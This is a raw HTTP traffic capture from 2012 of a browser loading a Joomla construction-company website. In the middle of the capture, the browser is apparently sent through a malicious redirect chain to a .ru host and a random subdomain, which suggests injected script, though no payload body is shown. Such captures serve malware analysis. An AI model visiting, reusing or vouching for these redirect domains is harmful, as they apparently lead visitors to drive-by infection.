Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Sun, 21 Feb 2010 14:32:22 GMT
Etag: &quot;83227d7a-ad9-4801d2f406980&quot;
Accept-Ranges: bytes
Content-Length: 2777
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/suckerfish.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Thu, 11 Aug 2011 18:15:55 GMT
Etag: &quot;86e93329-b71-4aa3ec9b39468&quot;
Accept-Ranges: bytes
Content-Length: 2929
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /includes/js/joomla.javascript.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:19 GMT
Etag: &quot;15cf1c-3cd5-4cdd63e5c7a28&quot;
Accept-Ranges: bytes
Content-Length: 15573
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/joomla_classes.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 05:08:00 GMT
Etag: &quot;86e93319-17c5-49e05b6752c00&quot;
Accept-Ranges: bytes
Content-Length: 6085
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/template_css.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2012 06:03:27 GMT
Etag: &quot;86e9b761-4912-4c382171fe098&quot;
Accept-Ranges: bytes
Content-Length: 18706
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /plugins/system/jceutilities/js/jceutilities.js?v=224 HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:23 GMT
Etag: &quot;80b6ec21-6e24-4cdd63e92412c&quot;
Accept-Ranges: bytes
Content-Length: 28196
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/typography.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 05:08:00 GMT
Etag: &quot;86e9333f-631-49e05b6752c00&quot;
Accept-Ranges: bytes
Content-Length: 1585
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /media/system/js/calendar.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:19 GMT
Etag: &quot;8223e8a3-86b2-4cdd63e5e1092&quot;
Accept-Ranges: bytes
Content-Length: 34482
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/gk_stuff.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 05:08:00 GMT
Etag: &quot;86e93345-1185-49e05b6752c00&quot;
Accept-Ranges: bytes
Content-Length: 4485
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/style1.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Wed, 07 Sep 2011 17:14:59 GMT
Etag: &quot;86e93322-d48-4ac5d1580bf1a&quot;
Accept-Ranges: bytes
Content-Length: 3400
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /templates/gk_gomuproject/lib/scripts/template_scripts.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:23 GMT
Etag: &quot;81094bde-841-4cdd63e933b32&quot;
Accept-Ranges: bytes
Content-Length: 2113
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /templates/gk_gomuproject/lib/scripts/jmenu_3.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:23 GMT
Etag: &quot;81094bd1-8c1-4cdd63e92cdd0&quot;
Accept-Ranges: bytes
Content-Length: 2241
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /templates/gk_gomuproject/lib/scripts/ie.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:23 GMT
Etag: &quot;81094bc4-22d-4cdd63e92606e&quot;
Accept-Ranges: bytes
Content-Length: 557
Keep-Alive: timeout=2, max=194
Connection: Keep-Alive
GET /_artykuly/css/artykuly.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Mon, 06 Feb 2012 17:43:39 GMT
Etag: &quot;3b01ce-43f-4b84f33ec58f1&quot;
Accept-Ranges: bytes
Content-Length: 1087
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /images/stories/_system/q2_07.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Tue, 09 Aug 2011 01:39:24 GMT
Etag: &quot;187be8-1d53-4aa08a22a8b00&quot;
Accept-Ranges: bytes
Content-Length: 7507
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /images/stories/_system/q1_034.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Fri, 05 Aug 2011 18:20:15 GMT
Etag: &quot;1b5d48-1f96-4a9c6261e95c0&quot;
Accept-Ranges: bytes
Content-Length: 8086
Keep-Alive: timeout=2, max=194
Connection: Keep-Alive
GET /images/stories/_linagora/gora_05.jpg HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Mon, 20 Jun 2011 05:59:05 GMT
Etag: &quot;15637d-6b5-4a61e6eccfc40&quot;
Accept-Ranges: bytes
Content-Length: 1717
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /images/stories/_linagora/gora_07.jpg HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Mon, 20 Jun 2011 05:59:05 GMT
Etag: &quot;156371-71c-4a61e6eccfc40&quot;
Accept-Ranges: bytes
Content-Length: 1820
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /templates/gk_gomuproject/images/logo.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 00:37:00 GMT
Etag: &quot;1e05ec-bc2-49f1b8f108300&quot;
Accept-Ranges: bytes
Content-Length: 3010
Keep-Alive: timeout=2, max=193
Connection: Keep-Alive
GET /templates/system/images/calendar.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Wed, 03 Jun 2009 04:46:42 GMT
Etag: &quot;83227d96-2a3-46b6a587af080&quot;
Accept-Ranges: bytes
Content-Length: 675
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /auxiliaryxga.cgi?8 HTTP/1.1

Host: disappointingtheproduct.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Tue, 06 Nov 2012 16:46:36 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_2_; expires=Wed, 07-Nov-2012 16:46:36 GMT; path=/; domain=disappointingtheproduct.ru
Location: http://igjfhiqm.LfLinkup.COM/Bymi8c56i76af1ZLfBNdIz2cJBJAUStF
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 193
GET /images/stories/_linafooter/lina-footer_18.jpg HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Mon, 20 Jun 2011 05:23:53 GMT
Etag: &quot;156400-8e7-4a61df0ea6c40&quot;
Accept-Ranges: bytes
Content-Length: 2279
Keep-Alive: timeout=2, max=193
Connection: Keep-Alive
GET /images/stories/_linafooter/lina-footer_15.jpg HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Mon, 20 Jun 2011 05:23:53 GMT
Etag: &quot;156403-54d-4a61df0ea6c40&quot;
Accept-Ranges: bytes
Content-Length: 1357
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /images/favicon.ico HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=192
Connection: Keep-Alive
GET /templates/gk_gomuproject/images/bg_menu.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/templates/gk_gomuproject/css/template_css.css
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 05:41:00 GMT
Etag: &quot;1e0589-b1d-49f1fce40d300&quot;
Accept-Ranges: bytes
Content-Length: 2845
Keep-Alive: timeout=2, max=194
Connection: Keep-Alive
GET /templates/gk_gomuproject/images/arrow.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/templates/gk_gomuproject/css/template_css.css
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 05:08:00 GMT
Etag: &quot;1ddfe3-74-49e05b6752c00&quot;
Accept-Ranges: bytes
Content-Length: 116
Keep-Alive: timeout=2, max=192
Connection: Keep-Alive
GET /auxiliaryxga.cgi?8 HTTP/1.1

Host: disappointingtheproduct.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Tue, 06 Nov 2012 16:46:36 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Wed, 07-Nov-2012 16:46:36 GMT; path=/; domain=disappointingtheproduct.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /images/stories/_loga/loga_11.png HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 16:44:17 GMT
Server: Apache
Last-Modified: Mon, 11 Jul 2011 22:03:39 GMT
Etag: &quot;82aa543a-d0bc-4a7d25b0704c0&quot;
Accept-Ranges: bytes
Content-Length: 53436
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /Bymi8c56i76af1ZLfBNdIz2cJBJAUStF HTTP/1.1

Host: igjfhiqm.lflinkup.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Server: nginx/0.7.67
Date: Tue, 06 Nov 2012 16:47:08 GMT
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze14
Set-Cookie: PHPSESSID=16mmmolcs5t9kbml0rbk95mpq2; path=/
Expires: Thu, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 277
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:17 GMT
Connection: keep-alive
GET /auxiliaryxga.cgi?8 HTTP/1.1

Host: disappointingtheproduct.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Tue, 06 Nov 2012 16:46:37 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Wed, 07-Nov-2012 16:46:37 GMT; path=/; domain=disappointingtheproduct.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /templates/gk_gomuproject/images/bodybg.jpg HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/templates/gk_gomuproject/css/template_css.css
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 16:44:17 GMT
